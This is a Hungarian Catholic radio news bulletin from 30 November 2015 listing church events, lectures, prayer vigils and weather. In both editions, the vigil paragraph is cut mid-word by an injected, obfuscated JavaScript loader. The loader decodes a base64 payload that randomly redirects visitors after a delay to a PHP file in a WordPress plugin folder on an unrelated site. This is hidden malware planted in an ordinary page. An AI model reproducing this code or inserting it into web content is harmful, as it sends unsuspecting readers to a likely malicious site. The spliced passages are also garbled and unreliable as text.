2015. november 30. – Hírek és programajánló

H Í R E K   E S T E

Ferenc pápa Afrikában nyitotta meg az irgalmasság szentévének első szentkapuját
A Szentatya Banguiban, a Közép-afrikai Köztársaság fővárosában nyitotta meg a Szeplőtelen Fogantatás ünnepén kezdődő irgalmasság szentévének első szentkapuját, majd ünnepi szentmisét mutatott be a főváros székesegyházában november 29-én, advent első vasárnapján.-tudtuk meg az erdely. ma honlapjáról

Örökös szentségimádási nap
A Gyulafehérvári Főegyházmegyében a holnapi nap folyamán a kiskapusi templomban tartják az örökös szentségimádási napot. Várják a híveket a közös imádatra.

Zsolozsma a Mária Rádióban
Az adventi szent idő megkezdésével újabb lehetőséget kínálunk hallgatóinknak a közös imádságra, mégpedig a zsolozsmázásra. Naponta három alkalommal végezzük  majd a papi zsolozsmát: az ébresztő műsor elején a reggeli dicséretet, délben, az Úrangyala ima után a napközi imaórát, majd este háromnegyed nyolctól az esti dicséretet, a completoriumot. Várjuk és hívjuk hallgatóinkat, kapcsolódjanak be az egyház eme szép imádságába.

10 éves a Szent András Iskola
A Szent András Evangelizációs Iskola szolgálata Romániában elérkezett a 10. születésnapjához. A Marosvásárhely – remeteszegi plébánián holnap délelőtt tíz és este hat óra között egész napos programra kerül sor. A jubileum alkalmából a délután öt órakor a szentmisét Oláh Dénes főesperes mutatja be. A belépés az egész napos alkalomra ingyenes. Jelentkezni lehet a samaj_arnold@yahoo.com e-mail címen, vagy a 0744 845224-es telefonszámon.

Önkéntes-találkozók decemberben
Elkezdődnek az idei év utolsó önkéntes-találkozói. Az első alkalomra Nagyváradon kerül sor, szerdán délután hat órától, majd csütörtökön folytatódik Kolozsváron délután fél öt órától a Szent Mihály Nőszövetség szentegyház utcai dísztermében. Pénteken délben Gyergyőszentmiklóson várjuk az önkéntesek, délután három órától pedig közönségtalálkozó lesz Háromkúton. A többi helyszínről és időpontról hírműsorainkban tájékoztatjuk hallgatóinkat.

Szerdai pár-beszéd Marosvásárhelyen
December 2-án, Marosvásárhelyen a Szerdai párbeszédek tizenkettedik alkalma következik. Témája: Öröm, ünnep és várakozás. Meghívott előadók Bara László plébános, Bakó Mária lelkigondozó, Becsky Borbála pszihológus,  Cosma István pszichológus, családterapeuta, mentálhigiénés szakember. Minden érdeklődőt várnak, este  hét órára az Ama Deus cukrászdába.

Engesztelő imavirrasztás Székelyudvarhelyen
A Mária Rádió székelyudvarhelyi kápolnájában december hónap első szerdáján egész éjjel virrasztást tartanak, tizenegy órától pedig szentmisét mutatnak be. Az engesztelő imavirrasztásra hívnak együtt imádkozni mindenkit, aki Jézussal szeretne időt tölteni. A virrasztást városukért, egyházközségeikért, a fiatalok testi-lelki tisztaságáért, a családokért, egyedülállókért, a jegyesekért, gyermeket vágyó és váró szülőkért, betegekért, elhunyt szeretteikért, saját magukért és egyéni szándékokra ajánlják az udvarhelyiek.
A kápolnában ugyanakkor minden reggel nyolc órától este nyolc óráig állfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó, egész napos szentségimádást tartanak. Várják az Istent imádni, engesztelni vágyókat.

Elsőpénteki keresztút az Ugron-kápolnánál
December 4-én, délután öt órától keresztúti ájtatosságot tartanak a szejkefürdői Ugron-kápolna felé vezető Székely Kálvárián. Várják mindazokat, akik családjaikért felajánlanak egy keresztútjárásnyi időt és imát.

A migráns-krízis…Forrai Tamás S.J. előadása
A Marosvásárhelyi Jezsuita Egyetemi Lelkészség szervezésében, december 5-én, szombaton este hét órakor a Loyola Caféban, P. Forrai Tamás Gergely jezsuita tartományfőnök a migráns kérdésről és a jezsuita menekültprogramról tart előadást.

Ifjúsági lelkinap a székelyudvarhelyi főesperesi kerületben
December 5-én, szombaton adventi kerületi ifjúsági lelkinapot szerveznek a székelyudvarhelyi Szent Pio Lelkigyakorlatos Házban. A program fél tíz órakor kezdődik melynek témája, „Irgalmas, mint az Atya…”, és délután fél öt órakor szentmisével zárul. Várnak minden érdeklődő fiatalt.

Az időjárásról: Holnap újra több lesz a felhő felettünk, hosszabban tartó napos időszakok inkább csak a déli országrészben fordulhatnak elő. Szórványosan továbbra is kialakulhat eső, zápor. Szeles napra készülhetünk, az ország nagy részén erős, viharos lökések is lehetnek. Hajnalban -5 és 2 fok várható, míg délután 4 és 12 fok közötti maximumokra van kilátás.

MRE - Hírszolgálat, 2015. november 30.


H Í R E K   R E G G E L / D É L B E N

Imakönyv a végeken való megmaradásért
Az elmúlt hétvégén tizennegyedik alkalommal rendezték meg Csíkszeredában a Csángó Napot. A rendezvény kiemelkedő eseménye a Nyisztor Tinka pusztinai néprajzkutató által szorgalmazott „Magyarul imádkoznak Szent István gyermekei a templomban” című kiadvány bemutatása volt. A kis füzet olyan imákat és énekeket tartalmaz, amelyek a helyi szájhagyományban maradtak fent, de amelyeket már évek óta énekelnek a pusztinai imacsoport tagjai. Valamennyi szöveg a nagyböjt ünnepkörébe tartozik, illetve az elhalálozáshoz, temetéshez kötődő népszokásokhoz kapcsolódik. A veretes szövegeket Ádám Gyula kifejező fotói teszik hangsúlyosabbá.-tájékoztat a szekelyhon.ro portál.

Szent András-napi búcsúk
Anyaszentegyházunk ma Szent András apostolra emlékezik.
Szentegyházasfaluban ma délelőtt tizenegy órakor ünneplik az egyházközség védőszentjét. Búcsús szentbeszédet mond Major Sándor kápolnásfalvi plébános.
Futásfalván szintén ma délelőtt tizenegy órakor kezdődik a búcsús szentmise, melynek ünnepi szónoka: Szőcs Csaba, a kolozsvári Verbum Keresztény Kulturális Egyesület igazgatója.

Örökös szentségimádási nap
A Gyulafehérvári Főegyházmegyében ma Bélafalván  tartják az örökös szentségimádási napot. Várják a híveket a közös imádatra.

Zsolozsma a Mária Rádióban
Az adventi szent idő megkezdésével újabb lehetőséget kínálunk hallgatóinknak a közös imádságra, mégpedig a zsolozsmázásra. Naponta három alkalommal végezzük  majd a papi zsolozsmát: az ébresztő műsor elején a reggeli dicséretet, délben, az Úrangyala ima után a napközi imaórát, majd este háromnegyed nyolctól az esti dicséretet, a completoriumot. Várjuk és hívjuk hallgatóinkat, kapcsolódjanak be az egyház eme szép imádságába.

Zárul a kolozsvári Szent Cecília orgonakoncert sorozat
Ma este hét órától különös eseményre kerül sor a Szent Cecília koncertsorozat XI. évadjának záró rendezvényén. A Musica Transylvanica sorozat keretében CD-lemez és kottás kötet bemutatóval egybekötött hangverseny lesz, amely Ruzitska György zeneszerző és orgonaművész munkásságának állít emléket. A Bécsből származó Ruzitska György, a 19. századi kolozsvári zeneiélet kulcsfontosságú alakja, aki 1835-1869 között a helyi Konzervatórium igazgatója volt és a Piarista templom karnagya. Zeneszerzői tevékenysége is gazdag, az orgonaművein kívül, szimfóniát, operát, miséket és számos kamaraművet komponált. A lemezről, illetve a kottás kötetről az előadók és szerkesztők beszélnek: Erich Türk és Potyó István, kolozsvári orgonisták. Várnak minden érdeklődőt és orgonamuzsika kedvelőt! 

Önkéntes-találkozók decemberben
Elkezdődnek az idei év utolsó önkéntes-találkozói. Az első alkalomra Nagyváradon kerül sor, szerdán délután hat órától, majd csütörtökön folytatódik Kolozsváron délután fél öt órától a Szent Mihály Nőszövetség szentegyház utcai dísztermében. Pénteken délben Gyergyőszentmiklóson várjuk az önkéntesek, délután három órától pedig közönségtalálkozó lesz Háromkúton. A többi helyszínről és időpontról hírműsorainkban tájékoztatjuk  hallgatóinkat.

Szerdai pár-beszéd Marosvásárhelyen 
December 2-án, Marosvásárhelyen a Szerdai párbeszédek tizenkettedik alkalma következik. Témája: Öröm, ünnep és várakozás. Meghívott előadók Bara László plébános, Bakó Mária lelkigondozó, Becsky Borbála pszihológus,  Cosma István pszichológus, családterapeuta, mentálhigiénés szakember. Minden érdeklődőt várnak, este  hét órára az Ama Deus cukrászdába.

Engesztelő imavirrasztás Székelyudvarhelyen 
A Mária Rádió székelyudvarhelyi kápolnájában december hónap első szerdáján egész éjjel virrasztást tartanak, tizenegy órától pedig szentmisét mutatnak be. Az engesztelő imavirrasztásra hívnak együtt imádkozni mindenkit, aki Jézussal szeretne időt tölteni. A virrasztást városukért, egyházközségeikért, a fiatalok testi-lelki tisztaságáért, a családokért, egyedülállókért, a jegyesekért, gyermeket vágyó és váró szülőkért, betegekért, elhunyt szeretteikért, saját magukért és egyéni szándékokra ajánlják az udvarhelyiek. A kápolnában ugyanakkor minden reggel nyolc órától este nyolc óráig állfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó, egész napos szentségimádást tartanak. Várják az Istent imádni, engesztelni vágyókat. 

Az időjárásról: Ma újra több lesz felettünk a felhő és a déli, délkeleti tájak kivételével többfelé kialakulhat kisebb eső, zápor. Szeles napra készülhetünk, az ország északi felén többfelé erős, viharos lökések kísérhetik a nyugatias szelet. Hajnalban -3 - +4°C, nappal 6-10°C között alakul a hőmérséklet. 

MRE - Hírszolgálat, 2015. november 30.

About the author

maradmin

Leave a Comment